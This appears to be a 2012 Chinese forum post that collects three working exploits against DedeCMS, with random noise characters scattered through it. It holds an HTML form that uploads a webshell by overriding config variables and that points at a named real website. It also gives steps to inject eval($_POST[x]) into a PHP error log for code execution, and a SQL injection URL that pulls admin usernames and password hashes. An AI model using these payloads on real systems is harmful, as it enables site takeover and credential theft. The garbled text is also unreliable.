. [$ j- U' E+ n5 Z b/ q$ I o& z! O9 ^0 ?1 Z, s' `) n
7 o$ ^. O! r) y, }+ S/ J# q3 L
* a! i1 o9 g( m: l4 }+ S. z0 E# g2 ?& x: M/ _8 \* i; V7 c
8 H g* q" Q$ ]
3 {/ Z# h1 l& l9 V# b a织梦(Dedecms)select_soft_post.php页面变量未初始漏洞% V) B0 X* f2 Z( m( V
<html>
2 V0 b W) ^) B5 Z/ o% j% ~/ d5 ~<head>
0 B6 I6 ~. h G/ ~( r% C( k<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
2 y2 ~+ V. E9 h3 g</head>) V/ [% J5 W7 c& k
<body style="FONT-SIZE: 9pt">9 b I; f) w- h- d6 I4 D f
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
, s9 ?, I5 O0 H0 P<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
( [& v5 L3 T, n9 ^/ r<input type='hidden' name='activepath' value='/data/cache/' />
( u% Q& q( j$ n# u1 N9 @* K<input type='hidden' name='cfg_basedir' value='../../' />0 h, }: ~; m+ g0 Q
<input type='hidden' name='cfg_imgtype' value='php' />8 k, l+ m" M# Y
<input type='hidden' name='cfg_not_allowall' value='txt' />
7 p/ z: E3 d* j8 O$ v<input type='hidden' name='cfg_softtype' value='php' />
, R) u* B4 A+ f% Y, \: e6 m<input type='hidden' name='cfg_mediatype' value='php' />3 @! e E3 @( @
<input type='hidden' name='f' value='form1.enclosure' />
7 e$ k% L0 a; ^. c7 |- {( b" F% w<input type='hidden' name='job' value='upload' />
7 b+ Y! N; T8 x4 `<input type='hidden' name='newname' value='fly.php' />
/ {4 w, b* g; eSelect U Shell <input type='file' name='uploadfile' size='25' />; {# Z$ \$ y: r/ J- f: r
<input type='submit' name='sb1' value='确定' />
$ Z8 o0 y/ ?; f. y</form>6 o+ Y& y7 J0 A! E5 H+ l j6 h0 ?
<br />It's just a exp for the bug of Dedecms V55...<br />
+ V# T5 p* w; ?& A3 bNeed register_globals = on...<br />+ A! D U; @4 k6 I
Fun the game,get a webshell at /data/cache/fly.php...<br />
8 Z/ W; I/ j; L% I/ [</body>
- c$ G) b7 t7 G# C</html>; t1 V; M3 J* u
. D# }$ h1 D- S& o6 t8 ^
- L8 p8 v% g: e! n @* Z# B
4 x# q, A+ z7 Z
3 J3 T! X& b3 A+ ~/ W/ e6 P+ _2 c* |* O8 C) P% I u
$ f4 G+ l6 e. A. w1 }6 I$ v1 z3 _
# U3 y" M. l( Z" q$ A" K
( I* l3 Y' ]& N6 d E
6 [% D s9 \ _" j# l5 y( r9 _
+ J( C4 @! u3 k0 i: i9 s' N织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞' o& ^0 ?# \( \4 m
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
* V4 P a4 p: e% ~1. 访问网址:3 y4 f6 \0 v% ~) o2 _3 D0 W4 B
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
! d5 ^: b$ b5 g* M可看见错误信息
( J) v( y6 ?. g8 L ]0 M2 @7 f
~! s# f$ \& v$ H+ q9 l. H9 y5 [9 N
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。7 o7 f: n+ z% V1 Q7 B
int(3) Error: Illegal double '1024e1024' value found during parsing
! O) @ Q# |& k1 o$ |6 mError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
% N/ C0 U2 y9 z# I7 u2 z( R3 V5 n4 Y& v- G/ s) F
* k! L u8 i: \9 h1 k
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
3 {% k0 _1 o" _ z: l, f% j+ C2 c$ [7 E! y1 H3 r2 P
9 j- T4 t& S$ j0 J' y<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>! \2 y. r/ E, B
1 Q- N: M$ o4 |% } j7 Q5 I3 y! q$ K/ s# G2 @# v# n! i8 D- u
按确定后的看到第2步骤的信息表示文件木马上传成功.5 E* T# ~9 M4 `6 E% L4 D
1 a. }# F. n7 K1 F8 x/ ^- @
& w+ P" I, ~' W' V% v5 |1 o- E! w( p1 _, i
3 V' m2 L$ {8 F3 K2 ~
, H) L* g" u6 o7 C* g! f- V
; \, Z; \" Q; R
: ~5 s' W+ Z/ B M# T2 G6 S! l* H4 h* Q2 b8 B
- v" `% B9 ^3 i. H! u& G
, K) i' W+ I9 W5 S; P5 h
- X r, d4 ]1 d# M8 t3 k' P0 m/ L4 o$ j( K
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
$ ~6 D" P$ m( v) Mhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对